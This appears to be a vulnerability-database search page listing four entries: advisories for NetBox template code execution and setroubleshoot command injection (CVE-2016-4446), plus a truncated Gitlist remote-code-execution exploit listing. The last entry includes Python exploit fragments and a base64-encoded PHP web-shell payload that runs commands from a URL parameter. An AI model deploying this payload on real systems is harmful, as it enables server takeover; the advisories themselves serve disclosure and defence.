4 matches found
PT-2026-36830
Name of the Vulnerable Software and Affected Versions NetBox versions 4.3.5 through 4.5.4 Description An issue in the RenderTemplateMixin.get environment params method allows authenticated users with exporttemplate or configtemplate permissions to execute arbitrary code. By specifying malicious...
SUSE CVE-2016-4446
The allowexecstack plugin for setroubleshoot allows local users to execute arbitrary commands by triggering an execstack SELinux denial with a crafted filename, related to the commands.getoutput function...
setroubleshoot-plugins: insecure commands.getoutput use in the allow_execstack plugin
A shell command injection flaw was found in the way the setroubleshoot allowexecstack plugin executed external commands. A local attacker able to trigger an execstack SELinux denial could use this flaw to execute arbitrary code with root privileges...
Gitlist <= 0.4.0 - Remote Code Execution Exploit
Exploit for multiple platform in category remote exploits from commands import getoutput import urllib import sys """ Exploit Title: Gitlist 2: path = sys.argv2 print '! Using cache location %s' % path payload payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=" sploit; python requests does not like...